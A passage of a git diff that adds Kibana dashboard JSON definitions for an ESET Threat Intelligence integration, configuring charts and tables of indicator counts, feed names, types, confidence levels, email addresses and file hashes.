"emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "threat.indicator.file.hash.sha256" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "3571d718-049f-40ef-8f42-43c58e9e3a76", + "layerId": "f2027bff-c26e-4f79-9a95-1903f4845032", + "layerType": "data", + "size": "l", + "textAlign": "center", + "titlePosition": "bottom" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 10, + "i": "4c2ca71b-c123-4c51-b2e3-e57f50ea0f61", + "w": 9, + "x": 39, + "y": 0 + }, + "panelIndex": "4c2ca71b-c123-4c51-b2e3-e57f50ea0f61", + "title": "Unique SHA256", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-6c4a95f2-3075-4c44-9fff-40181d8cce3f", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "6c4a95f2-3075-4c44-9fff-40181d8cce3f": { + "columnOrder": [ + "36f43d23-f250-4744-a941-bbe07de60f42", + "72db0f24-0ba3-4ffc-a6cd-7cc80909757f", + "1ba9e8df-59e9-44b5-84a8-498f18b8e825" + ], + "columns": { + "1ba9e8df-59e9-44b5-84a8-498f18b8e825": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "36f43d23-f250-4744-a941-bbe07de60f42": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of threat.feed.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "1ba9e8df-59e9-44b5-84a8-498f18b8e825", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "threat.feed.name" + }, + "72db0f24-0ba3-4ffc-a6cd-7cc80909757f": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "1ba9e8df-59e9-44b5-84a8-498f18b8e825" + ], + "layerId": "6c4a95f2-3075-4c44-9fff-40181d8cce3f", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "splitAccessor": "36f43d23-f250-4744-a941-bbe07de60f42", + "xAccessor": "72db0f24-0ba3-4ffc-a6cd-7cc80909757f" + } + ], + "legend": { + "isVisible": true, + "position": "right" + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 11, + "i": "75d9ea51-d5d6-44b4-8aeb-d7068984118f", + "w": 19, + "x": 8, + "y": 10 + }, + "panelIndex": "75d9ea51-d5d6-44b4-8aeb-d7068984118f", + "title": "Indicators", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-a53a8936-8b0c-4a8f-9f78-bdbc17f69195", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "a53a8936-8b0c-4a8f-9f78-bdbc17f69195": { + "columnOrder": [ + "e174c003-d874-4335-a5d1-cc32b563584a", + "fd2cc2ea-6e8a-4a24-b0b9-42c227797012" + ], + "columns": { + "e174c003-d874-4335-a5d1-cc32b563584a": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Top values by description", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "fd2cc2ea-6e8a-4a24-b0b9-42c227797012", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "multi_terms" + }, + "secondaryFields": [ + "threat.indicator.description" + ], + "size": 50 + }, + "scale": "ordinal", + "sourceField": "threat.feed.name" + }, + "fd2cc2ea-6e8a-4a24-b0b9-42c227797012": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "e174c003-d874-4335-a5d1-cc32b563584a", + "isTransposed": false, + "oneClickFilter": true + }, + { + "columnId": "fd2cc2ea-6e8a-4a24-b0b9-42c227797012", + "isTransposed": false + } + ], + "layerId": "a53a8936-8b0c-4a8f-9f78-bdbc17f69195", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {} + }, + "gridData": { + "h": 11, + "i": "de263cf5-ac36-416c-962e-202a26348380", + "w": 21, + "x": 27, + "y": 10 + }, + "panelIndex": "de263cf5-ac36-416c-962e-202a26348380", + "type": "lens", + "version": "8.10.1" + } + ], + "timeRestore": false, + "title": "[Logs ESET] Files", + "version": 1 + }, + "coreMigrationVersion": "8.8.0", + "created_at": "2023-11-23T11:27:54.389Z", + "id": "ti_eset-4fc91930-819a-11ee-a704-a3364df0a052", + "managed": false, + "references": [ + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "8420f9ae-7160-4255-92de-88c4bb1a58c9:indexpattern-datasource-layer-08036a92-d500-4966-98ca-feff7f9ecb36", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "022ad52f-3c7e-4509-ac6a-05977f25d523:indexpattern-datasource-layer-f2027bff-c26e-4f79-9a95-1903f4845032", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "45860e3d-e2d0-4235-9e4a-0b39ef9d7b31:indexpattern-datasource-layer-f2027bff-c26e-4f79-9a95-1903f4845032", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "4c2ca71b-c123-4c51-b2e3-e57f50ea0f61:indexpattern-datasource-layer-f2027bff-c26e-4f79-9a95-1903f4845032", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "75d9ea51-d5d6-44b4-8aeb-d7068984118f:indexpattern-datasource-layer-6c4a95f2-3075-4c44-9fff-40181d8cce3f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "de263cf5-ac36-416c-962e-202a26348380:indexpattern-datasource-layer-a53a8936-8b0c-4a8f-9f78-bdbc17f69195", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_bec9c1a6-faec-4fed-898d-24bc09666953:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "ti_eset-ed13a500-8192-11ee-a704-a3364df0a052", + "name": "tag-ref-ti_eset-ed13a500-8192-11ee-a704-a3364df0a052", + "type": "tag" + }, + { + "id": "ti_eset-security-solution-default", + "name": "tag-ref-ti_eset-security-solution-default", + "type": "tag" + } + ], + "type": "dashboard", + "typeMigrationVersion": "8.9.0" +} \ No newline at end of file diff --git a/packages/ti_eset/kibana/dashboard/ti_eset-c27d91e0-819a-11ee-a704-a3364df0a052.json b/packages/ti_eset/kibana/dashboard/ti_eset-c27d91e0-819a-11ee-a704-a3364df0a052.json new file mode 100644 index 00000000000..8b7657be60d --- /dev/null +++ b/packages/ti_eset/kibana/dashboard/ti_eset-c27d91e0-819a-11ee-a704-a3364df0a052.json @@ -0,0 +1,993 @@ +{ + "attributes": { + "controlGroupInput": { + "chainingSystem": "HIERARCHICAL", + "controlStyle": "oneLine", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"83a17707-4eb4-41a9-beaa-e72e260453b2\":{\"type\":\"optionsListControl\",\"order\":0,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"83a17707-4eb4-41a9-beaa-e72e260453b2\",\"fieldName\":\"data_stream.dataset\",\"title\":\"Feed name\",\"grow\":true,\"width\":\"medium\",\"enhancements\":{}}}}" + }, + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "negate": false, + "params": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "event.kind", + "index": "logs-*", + "key": "event.kind", + "negate": false, + "params": { + "query": "enrichment" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "enrichment" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "threat.indicator.type", + "index": "logs-*", + "key": "threat.indicator.type", + "negate": true, + "params": [ + "domain-name", + "file", + "ipv4-addr", + "url" + ], + "type": "phrases", + "value": [ + "domain-name", + "file", + "ipv4-addr", + "url" + ] + }, + "query": { + "bool": { + "minimum_should_match": 1, + "should": [ + { + "match_phrase": { + "threat.indicator.type": "domain-name" + } + }, + { + "match_phrase": { + "threat.indicator.type": "file" + } + }, + { + "match_phrase": { + "threat.indicator.type": "ipv4-addr" + } + }, + { + "match_phrase": { + "threat.indicator.type": "url" + } + } + ] + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "_index", + "index": "logs-*", + "key": "_index", + "negate": false, + "params": { + "query": "logs-ti_eset_latest.*" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "_index": "logs-ti_eset_latest.*" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "error.message", + "index": "logs-*", + "key": "error.message", + "negate": true, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "error.message" + } + } + } + ], + "relation": "AND", + "type": "combined" + }, + "query": {} + } + ], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "id": "", + "params": { + "fontSize": 12, + "markdown": "#### ESET Threat Intelligence\n**Navigation**\n\n- [Overview](/app/dashboards#/view/ti_eset-f608e350-8192-11ee-a704-a3364df0a052)\n- [Domains, URL, IP](/app/dashboards#/view/ti_eset-402bf6b0-8194-11ee-a704-a3364df0a052)\n- [Files](/app/dashboards#/view/ti_eset-4fc91930-819a-11ee-a704-a3364df0a052)\n- **[Other indicators (This page)](/app/dashboards#/view/ti_eset-c27d91e0-819a-11ee-a704-a3364df0a052)**\n\n[Integrations Page](/app/integrations/detail/ti_eset/overview)\n\nThis dashboard displays information about all remaining indicator types ingested from the ESET Threat Intelligence integration.\nThis includes x509 certificates, email addresses and others.\n", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + } + }, + "gridData": { + "h": 21, + "i": "9cdb7509-554b-438e-9749-fd650fa684e3", + "w": 8, + "x": 0, + "y": 0 + }, + "panelIndex": "9cdb7509-554b-438e-9749-fd650fa684e3", + "type": "visualization", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-eba6f3ca-af23-403f-8828-7c7a11af1337", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "eba6f3ca-af23-403f-8828-7c7a11af1337": { + "columnOrder": [ + "b2694625-806e-4d4d-b96a-0b3ea2037123" + ], + "columns": { + "b2694625-806e-4d4d-b96a-0b3ea2037123": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total indicators", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "b2694625-806e-4d4d-b96a-0b3ea2037123", + "colorMode": "Labels", + "layerId": "eba6f3ca-af23-403f-8828-7c7a11af1337", + "layerType": "data", + "palette": { + "name": "custom", + "params": { + "colorStops": [ + { + "color": "#ff5d5d", + "stop": null + }, + { + "color": "#005e4f", + "stop": 1 + } + ], + "continuity": "all", + "maxSteps": 5, + "name": "custom", + "progression": "fixed", + "rangeMax": null, + "rangeMin": null, + "rangeType": "number", + "reverse": false, + "steps": 3, + "stops": [ + { + "color": "#ff5d5d", + "stop": 1 + }, + { + "color": "#005e4f", + "stop": 81780 + } + ] + }, + "type": "palette" + }, + "size": "l", + "textAlign": "center", + "titlePosition": "bottom" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 8, + "i": "3b89b235-df4c-4068-8a24-6426797a082d", + "w": 8, + "x": 8, + "y": 0 + }, + "panelIndex": "3b89b235-df4c-4068-8a24-6426797a082d", + "title": "Total indicators", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-e90d8bf4-3571-4bce-9ab0-548c27b3137b", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "e90d8bf4-3571-4bce-9ab0-548c27b3137b": { + "columnOrder": [ + "c2e851a0-ad60-4f6e-b109-bfb47f6f1f29", + "e6c6c5ad-0bdc-45ff-bb0a-ea55c9888c26" + ], + "columns": { + "c2e851a0-ad60-4f6e-b109-bfb47f6f1f29": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of threat.indicator.type", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": true, + "orderBy": { + "columnId": "e6c6c5ad-0bdc-45ff-bb0a-ea55c9888c26", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "threat.indicator.type" + }, + "e6c6c5ad-0bdc-45ff-bb0a-ea55c9888c26": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "e90d8bf4-3571-4bce-9ab0-548c27b3137b", + "layerType": "data", + "legendDisplay": "show", + "metrics": [ + "e6c6c5ad-0bdc-45ff-bb0a-ea55c9888c26" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "c2e851a0-ad60-4f6e-b109-bfb47f6f1f29" + ] + } + ], + "shape": "donut" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 8, + "i": "36f43892-5ab9-4234-bc5d-234e6e70ab89", + "w": 10, + "x": 16, + "y": 0 + }, + "panelIndex": "36f43892-5ab9-4234-bc5d-234e6e70ab89", + "title": "Indicators by type", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-08036a92-d500-4966-98ca-feff7f9ecb36", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "08036a92-d500-4966-98ca-feff7f9ecb36": { + "columnOrder": [ + "99f24050-c517-46ff-85b1-f3ceea4c9e15", + "67920793-58db-49b6-aca9-273945fffbce" + ], + "columns": { + "67920793-58db-49b6-aca9-273945fffbce": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + }, + "99f24050-c517-46ff-85b1-f3ceea4c9e15": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of threat.indicator.confidence", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "67920793-58db-49b6-aca9-273945fffbce", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "threat.indicator.confidence" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "08036a92-d500-4966-98ca-feff7f9ecb36", + "layerType": "data", + "legendDisplay": "show", + "metrics": [ + "67920793-58db-49b6-aca9-273945fffbce" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "99f24050-c517-46ff-85b1-f3ceea4c9e15" + ] + } + ], + "shape": "donut" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 8, + "i": "e35a1652-3081-4545-a3ef-db0ac8b9b680", + "w": 10, + "x": 26, + "y": 0 + }, + "panelIndex": "e35a1652-3081-4545-a3ef-db0ac8b9b680", + "title": "Confidence Levels", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-bb3bb9c5-ae3e-4b2e-9c1b-ec0a24c9b7d1", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "bb3bb9c5-ae3e-4b2e-9c1b-ec0a24c9b7d1": { + "columnOrder": [ + "145e9150-c82c-4521-b626-465fd6051bc0", + "22fbe26b-4375-4805-9400-f7377d5a8ff2" + ], + "columns": { + "145e9150-c82c-4521-b626-465fd6051bc0": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of threat.indicator.email.address", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "22fbe26b-4375-4805-9400-f7377d5a8ff2", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "threat.indicator.email.address" + }, + "22fbe26b-4375-4805-9400-f7377d5a8ff2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "145e9150-c82c-4521-b626-465fd6051bc0", + "isTransposed": false, + "oneClickFilter": false + }, + { + "columnId": "22fbe26b-4375-4805-9400-f7377d5a8ff2", + "isTransposed": false + } + ], + "layerId": "bb3bb9c5-ae3e-4b2e-9c1b-ec0a24c9b7d1", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 8, + "i": "b4844f80-8d75-4bdb-bba7-9ca56cec45d7", + "w": 12, + "x": 36, + "y": 0 + }, + "panelIndex": "b4844f80-8d75-4bdb-bba7-9ca56cec45d7", + "title": "Unique email addresses", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-4cf2e420-ecde-40bc-b31e-13c949179835", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "4cf2e420-ecde-40bc-b31e-13c949179835": { + "columnOrder": [ + "dbf0d15d-41f8-4c67-8ba7-010a8d300f47", + "287130d2-0132-418b-8df1-54aaf692e213", + "709a13b8-d71b-4339-96a9-26af5c0873fd" + ], + "columns": { + "287130d2-0132-418b-8df1-54aaf692e213": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "709a13b8-d71b-4339-96a9-26af5c0873fd": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "dbf0d15d-41f8-4c67-8ba7-010a8d300f47": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of threat.feed.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "709a13b8-d71b-4339-96a9-26af5c0873fd", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "threat.feed.name" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "709a13b8-d71b-4339-96a9-26af5c0873fd" + ], + "layerId": "4cf2e420-ecde-40bc-b31e-13c949179835", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "splitAccessor": "dbf0d15d-41f8-4c67-8ba7-010a8d300f47", + "xAccessor": "287130d2-0132-418b-8df1-54aaf692e213" + } + ], + "legend": { + "isVisible": true, + "position": "right" + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": { + "dynamicActions": { + "events": [] + } + } + }, + "gridData": { + "h": 13, + "i": "990ecf0c-790b-4b0a-94d1-f8d5d154b655", + "w": 21, + "x": 8, + "y": 8 + }, + "panelIndex": "990ecf0c-790b-4b0a-94d1-f8d5d154b655", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-fa6ca743-61a5-4276-894b-f2478d6ac1c9", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "fa6ca743-61a5-4276-894b-f2478d6ac1c9": { + "columnOrder": [ + "8015bd06-c3b9-492a-9713-31d26536b422", + "ec324dcc-c341-408f-961d-bf050d2ba5f0" + ], + "columns": { + "8015bd06-c3b9-492a-9713-31d26536b422": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "IoC by Category \u003e\u003e Meta category", + "operationType": "terms", + "params": { + "accuracyMode": true, + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": true, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" + }, + "orderBy": { + "type": "custom" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "multi_terms" + }, + "secondaryFields": [ + "eset.meta_category" + ], + "size": 50 + }, + "scale": "ordinal", + "sourceField": "eset.category" + }, + "ec324dcc-c341-408f-961d-bf050d2ba5f0": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {} + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "alignment": "left", + "colorMode": "none", + "columnId": "8015bd06-c3b9-492a-9713-31d26536b422", + "oneClickFilter": false, + "width": 1447.5 + }, + { + "alignment": "left", + "colorMode": "none", + "columnId": "ec324dcc-c341-408f-961d-bf050d2ba5f0" + } + ], + "layerId": "fa6ca743-61a5-4276-894b-f2478d6ac1c9", + "layerType": "data", + "sorting": { + "columnId": "8015bd06-c3b9-492a-9713-31d26536b422" + } + } + }, + "title": "Indicators description (copy) (converted)", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 13, + "i": "37dab396-d238-4569-8051-4850ada0fd4a", + "w": 19, + "x": 29, + "y": 8 + }, + "panelIndex": "37dab396-d238-4569-8051-4850ada0fd4a", + "title": "Category \u003e\u003e Meta category", + "type": "lens", + "version": "8.10.1" + } + ], + "timeRestore": false, + "title": "[Logs ESET] Other indicators", + "version": 1 + }, + "coreMigrationVersion": "8.8.0", + "created_at": "2023-11-23T11:38:49.052Z", + "id": "ti_eset-c27d91e0-819a-11ee-a704-a3364df0a052", + "managed": false, + "references": [ + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "3b89b235-df4c-4068-8a24-6426797a082d:indexpattern-datasource-layer-eba6f3ca-af23-403f-8828-7c7a11af1337", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "36f43892-5ab9-4234-bc5d-234e6e70ab89:indexpattern-datasource-layer-e90d8bf4-3571-4bce-9ab0-548c27b3137b", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "e35a1652-3081-4545-a3ef-db0ac8b9b680:indexpattern-datasource-layer-08036a92-d500-4966-98ca-feff7f9ecb36", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "b4844f80-8d75-4bdb-bba7-9ca56cec45d7:indexpattern-datasource-layer-bb3bb9c5-ae3e-4b2e-9c1b-ec0a24c9b7d1", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "990ecf0c-790b-4b0a-94d1-f8d5d154b655:indexpattern-datasource-layer-4cf2e420-ecde-40bc-b31e-13c949179835", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "37dab396-d238-4569-8051-4850ada0fd4a:indexpattern-datasource-layer-fa6ca743-61a5-4276-894b-f2478d6ac1c9", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_83a17707-4eb4-41a9-beaa-e72e260453b2:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "ti_eset-ed13a500-8192-11ee-a704-a3364df0a052", + "name": "tag-ref-ti_eset-ed13a500-8192-11ee-a704-a3364df0a052", + "type": "tag" + }, + { + "id": "ti_eset-security-solution-default", + "name": "tag-ref-ti_eset-security-solution-default", + "type": "tag" + } + ], + "type": "dashboard", + "typeMigrationVersion": "8.9.0" +} \ No newline at end of file diff --git a/packages/ti_eset/kibana/dashboard/ti_eset-f608e350-8192-11ee-a704-a3364df0a052.json b/packages/ti_eset/kibana/dashboard/ti_eset-f608e350-8192-11ee-a704-a3364df0a052.json new file mode 100644 index 00000000000..c6a7b8975ee --- /dev/null +++ b/packages/ti_eset/kibana/dashboard/ti_eset-f608e350-8192-11ee-a704-a3364df0a052.json @@ -0,0 +1,1106 @@ +{ + "attributes": { + "controlGroupInput": { + "chainingSystem": "HIERARCHICAL", + "controlStyle": "oneLine", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": 